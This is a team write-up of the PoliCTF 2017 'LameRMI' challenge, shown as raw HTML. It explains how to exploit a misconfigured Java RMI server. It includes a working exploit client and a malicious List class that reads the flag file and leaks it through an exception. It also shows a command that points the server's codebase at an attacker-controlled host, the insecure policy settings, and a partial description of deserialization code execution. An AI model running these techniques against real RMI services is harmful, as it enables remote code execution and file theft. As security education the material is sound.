<!DOCTYPE html><html lang="en" data-astro-cid-dxom2xcl> <head><!-- Global Metadata --><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" type="image/svg+xml" href="/favicon-dark.svg" media="(prefers-color-scheme: light)"><link rel="icon" type="image/svg+xml" href="/favicon.svg" media="(prefers-color-scheme: dark)"><meta name="generator" content="Astro v4.16.18"><!-- Font preloads --><link rel="preload" href="/fonts/atkinson-regular.woff" as="font" type="font/woff" crossorigin><link rel="preload" href="/fonts/atkinson-bold.woff" as="font" type="font/woff" crossorigin><!-- Canonical URL --><link rel="canonical" href="https://towerofhanoi.it/writeups/2017-07-12-lamermi/"><!-- Primary Meta Tags --><title>PoliCTF 2017 - Lamermi</title><meta name="title" content="PoliCTF 2017 - Lamermi"><meta name="description" content="Exploting a wildly misconfigured RMI server"><!-- Open Graph / Facebook --><meta property="og:type" content="website"><meta property="og:url" content="https://towerofhanoi.it/writeups/2017-07-12-lamermi/"><meta property="og:title" content="PoliCTF 2017 - Lamermi"><meta property="og:description" content="Exploting a wildly misconfigured RMI server"><meta property="og:image" content="https://towerofhanoi.it/writeups/2017-07-12-lamermi/preview.webp"><!-- Twitter --><meta property="twitter:card" content="summary_large_image"><meta property="twitter:url" content="https://towerofhanoi.it/writeups/2017-07-12-lamermi/"><meta property="twitter:title" content="PoliCTF 2017 - Lamermi"><meta property="twitter:description" content="Exploting a wildly misconfigured RMI server"><meta property="twitter:image" content="https://towerofhanoi.it/preview.webp"><style>:root{--accent: #fea819;--accent-dark: #ac7010;--accent-dark-010: #ac70100a}@font-face{font-family:Atkinson;src:url(/fonts/atkinson-regular.woff) format("woff");font-weight:400;font-style:normal;font-display:swap}@font-face{font-family:Atkinson;src:url(/fonts/atkinson-bold.woff) format("woff");font-weight:700;font-style:normal;font-display:swap}body{font-family:Atkinson,sans-serif;margin:0;padding:0;text-align:left;background:#171717 no-repeat;background-size:100% 600px;word-wrap:break-word;overflow-wrap:break-word;color:#aaa;font-size:20px;line-height:1.25}main{width:720px;max-width:calc(100% - 2em);margin:auto;padding:3em 1em}h1,h2,h3,h4,h5,h6{margin:1em 0 .5rem;color:#fff;line-height:1.2}h1{font-size:3.052em}h2{font-size:2.441em}h3{font-size:1.953em}h4{font-size:1.563em}h5{font-size:1.25em}strong,b{font-weight:700}a,a:hover{color:var(--accent)}p{margin-bottom:1em}textarea{width:100%;font-size:16px}input{font-size:16px}table{width:100%}img{max-width:100%;height:auto;border-radius:8px}code{padding:0 .3em;background-color:#1f1f1f;border-radius:.2em;font-size:.8em}pre{padding:1em;border-radius:.2em}pre>code{all:unset;font-size:.8em}blockquote{border-left:4px solid var(--accent);padding:.01em 0 .01em 1em;margin:0;background-color:var(--accent-dark-010)}hr{border:none;border-top:1px solid #e9e9e9}@media (max-width: 720px){body{font-size:18px}main{padding:1em}}.sr-only{border:0;padding:0;margin:0;position:absolute!important;height:1px;width:1px;overflow:hidden;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);clip-path:inset(50%);white-space:nowrap}table{border-collapse:collapse;text-align:center}tr{border:1px solid #e9e9e9}th,td{padding:.5em;text-align:center}th{background-color:#1f1f1f;color:#fff}td{background-color:#1b1b1b}a[data-astro-cid-eimmu3lg]{display:inline-block;text-decoration:none}a[data-astro-cid-eimmu3lg].active{font-weight:bolder;text-decoration:underline}header[data-astro-cid-3ef6ksr2]{margin:0;padding:0 1em;background:#1f1f1f;box-shadow:0 2px 8px rgba(var(--black),5%)}h2[data-astro-cid-3ef6ksr2]{margin:0;font-size:1em}h2[data-astro-cid-3ef6ksr2] a[data-astro-cid-3ef6ksr2],h2[data-astro-cid-3ef6ksr2] a[data-astro-cid-3ef6ksr2].active{text-decoration:none}nav[data-astro-cid-3ef6ksr2]{display:flex;align-items:center;justify-content:space-between}nav[data-astro-cid-3ef6ksr2] a[data-astro-cid-3ef6ksr2]{padding:1em .5em;color:var(--black);border-bottom:4px solid transparent;text-decoration:none}nav[data-astro-cid-3ef6ksr2] a[data-astro-cid-3ef6ksr2].active{text-decoration:none;border-bottom-color:var(--accent)}.social-links[data-astro-cid-3ef6ksr2],.social-links[data-astro-cid-3ef6ksr2] a[data-astro-cid-3ef6ksr2]{display:flex}@media (max-width: 720px){.social-links[data-astro-cid-3ef6ksr2]{display:none}}footer[data-astro-cid-sz7xmlte]{padding:2em 1em 6em;background:linear-gradient(var(--gray-gradient)) no-repeat;color:rgb(var(--gray));text-align:center}.social-links[data-astro-cid-sz7xmlte]{display:flex;justify-content:center;gap:1em;margin-top:1em}.social-links[data-astro-cid-sz7xmlte] a[data-astro-cid-sz7xmlte]{text-decoration:none;color:rgb(var(--gray))}.social-links[data-astro-cid-sz7xmlte] a[data-astro-cid-sz7xmlte]:hover{color:rgb(var(--gray-dark))}
@media (prefers-color-scheme: dark){.markdown-alert{--color-border-default: #30363d;--color-accent-fg: #58a6ff;--color-accent-emphasis: #1f6feb;--color-danger-fg: #f85149;--color-danger-emphasis: #da3633;--color-attention-fg: #d29922;--color-attention-emphasis: #9e6a03;--color-done-fg: #a371f7;--color-done-emphasis: #8957e5;--color-success-fg: #3fb950;--color-success-emphasis: #238636}}@media (prefers-color-scheme: light){.markdown-alert{--color-border-default: #d0d7de;--color-accent-fg: #0969da;--color-accent-emphasis: #0969da;--color-danger-fg: #d1242f;--color-danger-emphasis: #cf222e;--color-attention-fg: #9a6700;--color-attention-emphasis: #9a6700;--color-done-fg: #8250df;--color-done-emphasis: #8250df;--color-success-fg: #1a7f37;--color-success-emphasis: #1f883d}}.markdown-alert{border-left:.25em solid var(--borderColor-default, var(--color-border-default));color:inherit;margin-bottom:16px;padding:.5rem 1em}.markdown-alert>:last-child{margin-bottom:0!important}.markdown-alert .markdown-alert-title{align-items:center;display:flex;font-size:14px;font-weight:500;line-height:1}.markdown-alert .markdown-alert-title svg.octicon{margin-right:8px!important;margin-right:var(--base-size-8,8px)!important;fill:currentColor}.markdown-alert.markdown-alert-note{border-left-color:var(--borderColor-accent-emphasis,var(--color-accent-emphasis))}.markdown-alert.markdown-alert-note .markdown-alert-title{color:var(--color-accent-fg);color:var(--fgColor-accent,var(--color-accent-fg))}.markdown-alert.markdown-alert-tip{border-left-color:var(--borderColor-success-emphasis,var(--color-success-emphasis))}.markdown-alert.markdown-alert-tip .markdown-alert-title{color:var(--color-success-fg);color:var(--fgColor-success,var(--color-success-fg))}.markdown-alert.markdown-alert-important{border-left-color:var(--borderColor-done-emphasis,var(--color-done-emphasis))}.markdown-alert.markdown-alert-important .markdown-alert-title{color:var(--color-done-fg);color:var(--fgColor-done,var(--color-done-fg))}.markdown-alert.markdown-alert-warning{border-left-color:var(--borderColor-attention-emphasis,var(--color-attention-emphasis))}.markdown-alert.markdown-alert-warning .markdown-alert-title{color:var(--color-attention-fg);color:var(--fgColor-attention,var(--color-attention-fg))}.markdown-alert.markdown-alert-caution{border-left-color:var(--borderColor-danger-emphasis,var(--color-danger-emphasis))}.markdown-alert.markdown-alert-caution .markdown-alert-title{color:var(--color-danger-fg);color:var(--fgColor-danger,var(--color-danger-fg))}main[data-astro-cid-dxom2xcl]{width:calc(100% - 2em);max-width:100%;margin:0}.hero-image[data-astro-cid-dxom2xcl]{width:100%}.hero-image[data-astro-cid-dxom2xcl] img[data-astro-cid-dxom2xcl]{display:block;margin:0 auto;border-radius:12px;box-shadow:var(--box-shadow)}.prose[data-astro-cid-dxom2xcl]{width:75%;max-width:calc(100% - 2em);margin:auto;padding:1em;color:rgb(var(--gray-dark))}.title[data-astro-cid-dxom2xcl]{margin-bottom:1em;padding:1em 0;text-align:center;line-height:1}.title[data-astro-cid-dxom2xcl] h1[data-astro-cid-dxom2xcl]{margin:0 0 .5em}.date[data-astro-cid-dxom2xcl]{margin-bottom:.5em;color:rgb(var(--gray))}.last-updated-on[data-astro-cid-dxom2xcl]{font-style:italic}
</style></head> <body data-astro-cid-dxom2xcl> <header data-astro-cid-3ef6ksr2> <nav data-astro-cid-3ef6ksr2> <a href="/" style="padding: 1rem 0 0 0;" data-astro-cid-3ef6ksr2> <img src="/new_tower_logo.png" alt="Tower of Hanoi Logo" width="50rem" height="50rem" style="border-radius: 0;" data-astro-cid-3ef6ksr2> </a> <div class="internal-links" data-astro-cid-3ef6ksr2> <a href="/" data-astro-cid-3ef6ksr2 data-astro-cid-eimmu3lg> Home </a>  <a href="/blog" data-astro-cid-3ef6ksr2 data-astro-cid-eimmu3lg> Blogposts </a>  <a href="/writeups" class="active" data-astro-cid-3ef6ksr2 data-astro-cid-eimmu3lg> Writeups </a>  <a href="/about" data-astro-cid-3ef6ksr2 data-astro-cid-eimmu3lg> About </a>  </div> <div class="social-links" data-astro-cid-3ef6ksr2> <a href="https://x.com/towerofhanoi" target="_blank" data-astro-cid-3ef6ksr2> <span class="sr-only" data-astro-cid-3ef6ksr2>Follow Tower of Hanoi on Twitter</span> <svg viewBox="0 0 16 16" aria-hidden="true" width="32" height="32" data-astro-cid-3ef6ksr2><path fill="currentColor" d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z" data-astro-cid-3ef6ksr2></path></svg> </a> <a href="https://github.com/towerofhanoi" target="_blank" data-astro-cid-3ef6ksr2> <span class="sr-only" data-astro-cid-3ef6ksr2>Go to Tower of Hanoi's GitHub repo</span> <svg viewBox="0 0 16 16" aria-hidden="true" width="32" height="32" data-astro-cid-3ef6ksr2><path fill="currentColor" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.012 8.012 0 0 0 16 8c0-4.42-3.58-8-8-8z" data-astro-cid-3ef6ksr2></path></svg> </a> <a href="https://ctftime.org/team/300" target="_blank" data-astro-cid-3ef6ksr2> <span class="sr-only" data-astro-cid-3ef6ksr2>Go to Tower of Hanoi's CTF Time page</span> <svg viewBox="0 0 16 16" width="32" height="32" data-astro-cid-3ef6ksr2> <path fill="currentColor" d="M 0,0 H 16 V 16 H 0 L 4.7205698,7.7838485 Z" data-astro-cid-3ef6ksr2></path> </svg> </a> </div> </nav> </header>  <main data-astro-cid-dxom2xcl> <article data-astro-cid-dxom2xcl> <div class="hero-image" data-astro-cid-dxom2xcl> <img width="720" height="360" src="/writeup_images/polictf-2017.png" alt="" data-astro-cid-dxom2xcl> </div> <div class="prose" data-astro-cid-dxom2xcl> <div class="title" data-astro-cid-dxom2xcl> <div class="date" data-astro-cid-dxom2xcl> <time datetime="2017-07-12T05:00:00.000Z"> Jul 12, 2017 </time>  </div> <h1 data-astro-cid-dxom2xcl>PoliCTF 2017 - Lamermi</h1> <h3 data-astro-cid-dxom2xcl> by vigliag + mortic</h3> <hr data-astro-cid-dxom2xcl> </div>  <h1 id="lamermi-writeup">LameRMI Writeup</h1>
<p>LameRMI is a java/rmi pwning challenge written for 2017 edition of PoliCTF.</p>
<p>We know of two solutions to this challenge, this post details the one by the challenge’s author, and an alternative one by another ToH member.</p>
<p>Unfortunately, due to a bug in the start script, this challenge only became fully operative some hours after the beginning of the CTF. Interestingly, the alternative solution (the one we scripted and used to check the challenge was up) worked, as it didn’t depend on the benign functionalities of the server at all.</p>
<h3 id="description">Description</h3>
<ul>
<li>Bill is a computer science student</li>
<li>Bill managed to lock himself out of his own vps again</li>
<li>Bill remembers that a small program he wrote to understand RMI is still running on the server, and that to get it working he’s blindly copypasted snippets from stackoverflow and its professors slides. Maybe there’s still hope of getting the flag he left there.</li>
<li>Please help Bill</li>
</ul>
<p>Url: <code>lamermi.chall.polictf.it</code></p>
<h4 id="hintsupdates">Hints/Updates:</h4>
<ol>
<li>Pay attention that “http://” is not written anywhere (read the description!)</li>
<li>I heard that Bill’s security policy is not that strict…</li>
<li>There’s a webserver running on port 8000 as well. You may (or may not) need it.</li>
</ol>
<h2 id="authors-solution">Author’s solution</h2>
<h3 id="information-gathering">Information gathering</h3>
<ul>
<li>Running nmap on the server, you can find two open ports: 1099 (as expected), corresponding to an rmi registry, and an http server on port 8000</li>
<li>the http server contains a class file (which you can decompile with IntelliJ Idea) with the <code>AverageService</code> interface</li>
</ul>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#CB7676">public</span><span style="color:#CB7676"> interface</span><span style="color:#5DA994"> AverageService</span><span style="color:#CB7676"> extends</span><span style="color:#80A665"> Remote</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#DBD7CAEE">    Double </span><span style="color:#80A665">average</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">List</span><span style="color:#666666">&#x3C;</span><span style="color:#CB7676">Integer</span><span style="color:#666666">></span><span style="color:#BD976A"> integerList</span><span style="color:#666666">)</span><span style="color:#CB7676"> throws</span><span style="color:#DBD7CAEE"> RemoteException</span><span style="color:#666666">;</span></span>
<span class="line"><span style="color:#666666">}</span></span>
<span class="line"></span></code></pre>
<p>Documentation for RMI itself is available at the oracle website. The tutorial is available here: <a href="https://docs.oracle.com/javase/tutorial/rmi/overview.html">https://docs.oracle.com/javase/tutorial/rmi/overview.html</a></p>
<p>A good first step is querying the RMI registry for a list of exposed services:</p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#DBD7CAEE">Registry</span><span style="color:#BD976A"> registry</span><span style="color:#666666"> =</span><span style="color:#BD976A"> LocateRegistry</span><span style="color:#666666">.</span><span style="color:#80A665">getRegistry</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">lamermi.chall.polictf.it</span><span style="color:#C98A7D77">"</span><span style="color:#666666">,</span><span style="color:#4C9A91"> 1099</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#BD976A">System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">registry found</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#CB7676">String</span><span style="color:#666666">[]</span><span style="color:#BD976A"> ports</span><span style="color:#666666"> =</span><span style="color:#BD976A"> registry</span><span style="color:#666666">.</span><span style="color:#80A665">list</span><span style="color:#666666">();</span></span>
<span class="line"><span style="color:#4D9375">for</span><span style="color:#666666"> (</span><span style="color:#DBD7CAEE">String</span><span style="color:#BD976A"> port</span><span style="color:#4D9375">:</span><span style="color:#DBD7CAEE"> ports</span><span style="color:#666666">)</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#BD976A">    System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">port</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#666666">}</span></span>
<span class="line"><span style="color:#758575DD">// prints "AverageService"</span></span>
<span class="line"></span></code></pre>
<p>Using the previously found interface, we can also make queries to AverageService in the following way</p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#DBD7CAEE">AverageService</span><span style="color:#BD976A"> averageService</span><span style="color:#666666"> =</span><span style="color:#666666"> (</span><span style="color:#DBD7CAEE">AverageService</span><span style="color:#666666">)</span><span style="color:#BD976A"> registry</span><span style="color:#666666">.</span><span style="color:#80A665">lookup</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">AverageService</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#DBD7CAEE">ArrayList</span><span style="color:#666666">&#x3C;</span><span style="color:#CB7676">Integer</span><span style="color:#666666">></span><span style="color:#BD976A"> myIntList</span><span style="color:#666666"> =</span><span style="color:#4D9375"> new</span><span style="color:#DBD7CAEE"> ArrayList</span><span style="color:#666666">&#x3C;</span><span style="color:#CB7676">Integer</span><span style="color:#666666">>();</span></span>
<span class="line"><span style="color:#BD976A">myIntList</span><span style="color:#666666">.</span><span style="color:#80A665">add</span><span style="color:#666666">(</span><span style="color:#4C9A91">1</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#BD976A">myIntList</span><span style="color:#666666">.</span><span style="color:#80A665">add</span><span style="color:#666666">(</span><span style="color:#4C9A91">2</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#BD976A">myIntList</span><span style="color:#666666">.</span><span style="color:#80A665">add</span><span style="color:#666666">(</span><span style="color:#4C9A91">3</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#BD976A">System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#BD976A">averageService</span><span style="color:#666666">.</span><span style="color:#80A665">average</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">myIntList</span><span style="color:#666666">));</span><span style="color:#758575DD"> // prints "2.0"</span></span>
<span class="line"></span></code></pre>
<h3 id="finding-the-vulnerability">Finding the vulnerability</h3>
<p>The text says that the RMI application was built by a student in a hurry, following tutorials and blindly copypasting
code snippets. Since it is fairly difficult to accidentally insert vulnerabilities in java code (much less in a service
whose only input is a list of integers), the vulnerability must lie in a misconfiguration.</p>
<p>Skimming again the RMI tutorial, we can gather that RMI has a mechanism for loading missing classes from an external codebase over http. This behaviour is useful when the client and the server exchange (as parameters or return values)
concrete implementations of the interfaces the service defines. Normally there are security policies in place, ensuring
that code can only be loaded from certain places, and can only execute with specific permission, but since we’re talking
about a server misconfiguration, trying to exploit RMI class loading is certainly worth giving a shot.</p>
<p>The way we’ll perform the exploit is by writing our own implementation of List<integer>, and providing the class file to
the server via a public http server of our own. If we’re lucky, the server will make use of the codebase our client provides, and will load our malicious classes.</integer></p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#758575DD"># running our client (the exploit), note the codebase url we're telling the server to use </span></span>
<span class="line"><span style="color:#80A665">java</span><span style="color:#C99076"> -Djava.rmi.server.codebase=http://my.server.with.malicious.mylist.class/</span><span style="color:#C98A7D"> it.polictf.lamermi.Exploit</span></span>
<span class="line"></span></code></pre>
<h3 id="writing-the-exploit">Writing the exploit</h3>
<p>The following is the actual exploit code. We’ll write a myList class with a malicious iterator method (although other methods are fine as well), and exfiltrate
the flag by throwing an exception, which will be propagated to the client.</p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#CB7676">public</span><span style="color:#CB7676"> class</span><span style="color:#5DA994"> Exploit</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#CB7676">    public</span><span style="color:#CB7676"> static</span><span style="color:#CB7676"> void</span><span style="color:#80A665"> main</span><span style="color:#666666">(</span><span style="color:#CB7676">String</span><span style="color:#666666">[]</span><span style="color:#BD976A"> args</span><span style="color:#666666">)</span><span style="color:#CB7676"> throws</span><span style="color:#DBD7CAEE"> RemoteException</span><span style="color:#666666">,</span><span style="color:#DBD7CAEE"> NotBoundException </span><span style="color:#666666">{</span></span>
<span class="line"><span style="color:#DBD7CAEE">        Registry</span><span style="color:#BD976A"> registry</span><span style="color:#666666"> =</span><span style="color:#BD976A"> LocateRegistry</span><span style="color:#666666">.</span><span style="color:#80A665">getRegistry</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">lamermi.chall.polictf.it</span><span style="color:#C98A7D77">"</span><span style="color:#666666">,</span><span style="color:#4C9A91"> 1099</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#BD976A">        System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">registry found</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#DBD7CAEE">        AverageService</span><span style="color:#BD976A"> averageService</span><span style="color:#666666"> =</span><span style="color:#666666"> (</span><span style="color:#DBD7CAEE">AverageService</span><span style="color:#666666">)</span><span style="color:#BD976A"> registry</span><span style="color:#666666">.</span><span style="color:#80A665">lookup</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">AverageService</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#BD976A">        System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">average service found</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#DBD7CAEE">        List</span><span style="color:#666666">&#x3C;</span><span style="color:#CB7676">Integer</span><span style="color:#666666">></span><span style="color:#BD976A"> l</span><span style="color:#666666"> =</span><span style="color:#4D9375"> new</span><span style="color:#DBD7CAEE"> myList</span><span style="color:#666666">&#x3C;>();</span></span>
<span class="line"><span style="color:#BD976A">        System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">sending exploit</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#DBD7CAEE">        Double</span><span style="color:#BD976A"> result</span><span style="color:#666666"> =</span><span style="color:#BD976A"> averageService</span><span style="color:#666666">.</span><span style="color:#80A665">average</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">l</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#DBD7CAEE">        </span></span>
<span class="line"><span style="color:#BD976A">        System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">result</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#666666">    }</span></span>
<span class="line"><span style="color:#666666">}</span></span>
<span class="line"></span></code></pre>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#CB7676">public</span><span style="color:#CB7676"> class</span><span style="color:#5DA994"> myList</span><span style="color:#666666">&#x3C;</span><span style="color:#CB7676">E</span><span style="color:#666666">></span><span style="color:#CB7676"> implements</span><span style="color:#80A665"> List</span><span style="color:#666666">&#x3C;</span><span style="color:#CB7676">E</span><span style="color:#666666">>,</span><span style="color:#80A665"> Serializable</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#CB7676">    public</span><span style="color:#CB7676"> static</span><span style="color:#CB7676"> final</span><span style="color:#CB7676"> long</span><span style="color:#BD976A"> serialVersionUID</span><span style="color:#666666"> =</span><span style="color:#4C9A91"> 42L</span><span style="color:#666666">;</span></span>
<span class="line"><span style="color:#DBD7CAEE">    </span></span>
<span class="line"><span style="color:#758575DD">	//... other ovverrides</span></span>
<span class="line"><span style="color:#DBD7CAEE">	</span></span>
<span class="line"><span style="color:#666666">    @</span><span style="color:#CB7676">Override</span><span style="color:#CB7676"> public</span><span style="color:#DBD7CAEE"> Iterator</span><span style="color:#666666">&#x3C;</span><span style="color:#CB7676">E</span><span style="color:#666666">></span><span style="color:#80A665"> iterator</span><span style="color:#666666">()</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#4D9375">        try</span><span style="color:#666666">{</span></span>
<span class="line"><span style="color:#DBD7CAEE">            String</span><span style="color:#BD976A"> content</span><span style="color:#666666"> =</span><span style="color:#4D9375"> new</span><span style="color:#80A665"> String</span><span style="color:#666666">(</span><span style="color:#BD976A">Files</span><span style="color:#666666">.</span><span style="color:#80A665">readAllBytes</span><span style="color:#666666">(</span><span style="color:#BD976A">Paths</span><span style="color:#666666">.</span><span style="color:#80A665">get</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">flag</span><span style="color:#C98A7D77">"</span><span style="color:#666666">)));</span></span>
<span class="line"><span style="color:#4D9375">            throw</span><span style="color:#4D9375"> new</span><span style="color:#80A665"> Error</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">content</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#666666">        }</span><span style="color:#4D9375"> catch</span><span style="color:#666666"> (</span><span style="color:#DBD7CAEE">Exception </span><span style="color:#BD976A">e</span><span style="color:#666666">)</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#4D9375">            throw</span><span style="color:#4D9375"> new</span><span style="color:#80A665"> Error</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">e</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#666666">        }</span></span>
<span class="line"><span style="color:#666666">    }</span></span>
<span class="line"><span style="color:#DBD7CAEE">	</span></span>
<span class="line"><span style="color:#758575DD">	//... other ovverrides</span></span>
<span class="line"><span style="color:#666666">}</span></span>
<span class="line"></span></code></pre>
<h3 id="about-the-vulnerability">About the vulnerability:</h3>
<p>The server is vulnerable because of two pieces of configuration. The first one is this very permissive security policy,
which is not hard at all to find on the web and in stackoverflow questions.</p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>grant {</span></span>
<span class="line"><span>    permission java.security.AllPermission;</span></span>
<span class="line"><span>};</span></span>
<span class="line"><span></span></span></code></pre>
<p>The second vulnerability is admittedly less common, but you can still find it in stackoverflow answers. RMI has a
<a href="http://docs.oracle.com/javase/7/docs/technotes/guides/rmi/enhancements-7.html">java.rmi.server.useCodebaseOnly property</a> (defaulting to true since java7), which tells the server <em>not</em> to use codebases provided by clients. Setting it to false restores the old and insecure behaviour:</p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#758575DD"># Command we used to launch the server, note the useCodeBaseOnly flag</span></span>
<span class="line"><span style="color:#80A665">java</span><span style="color:#C99076"> \</span></span>
<span class="line"><span style="color:#C99076"> -Djava.security.policy=security.policy</span><span style="color:#C99076"> \</span></span>
<span class="line"><span style="color:#C99076"> -Djava.rmi.server.useCodebaseOnly=false</span><span style="color:#C99076"> \</span></span>
<span class="line"><span style="color:#C99076"> -Djava.rmi.server.hostname=lamermi.chall.polictf.it</span><span style="color:#C99076"> \</span></span>
<span class="line"><span style="color:#C99076"> -jar</span><span style="color:#C98A7D"> lamermi-1.0-SNAPSHOT.jar</span></span>
<span class="line"></span></code></pre>
<h2 id="mortics-writeup"><a href="https://ctftime.org/user/22776">Mortic’s</a> writeup</h2>
<h3 id="provided-informations">Provided informations</h3>
<p>Our target is an RMI registry at a given URL</p>
<h3 id="information-gathering-1">Information gathering</h3>
<p>We can start by scanning the server for RmiRegistries with nmap, <a href="https://nmap.org/nsedoc/scripts/rmi-dumpregistry.html">which has a built-in script</a> for that!</p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>nmap --script rmi-dumpregistry.nse -sV --version-all -p 1099 lamermi.chall.polictf.it</span></span>
<span class="line"><span></span></span></code></pre>
<p>We can suppose the port to be 1099 as it is the default port for RMI, a quick scan of the server would have shown that this hypothesis is correct.</p>
<p>There is a web server on port 8000 too that offers an interface: <code>AverageService</code> but playing with it doesn’t show anything interesting.</p>
<p>Searching around the internet I found that RMI serializes all the objects that are sent from a client to a RmiRegistry. Java deserialization process invokes a method of the objects it is reconstructing <strong>before</strong> any other check by the program takes place.</p>
<p>The method is <code>private void readObject(java.io.ObjectInputStream in)</code> and it can be overridden in any object implementing the Serializable interface. On deserializing, as it should happen, all the code in that method will be executed, so we can have a possible remote code execution by requesting the registry to deserialize a Java object.</p>
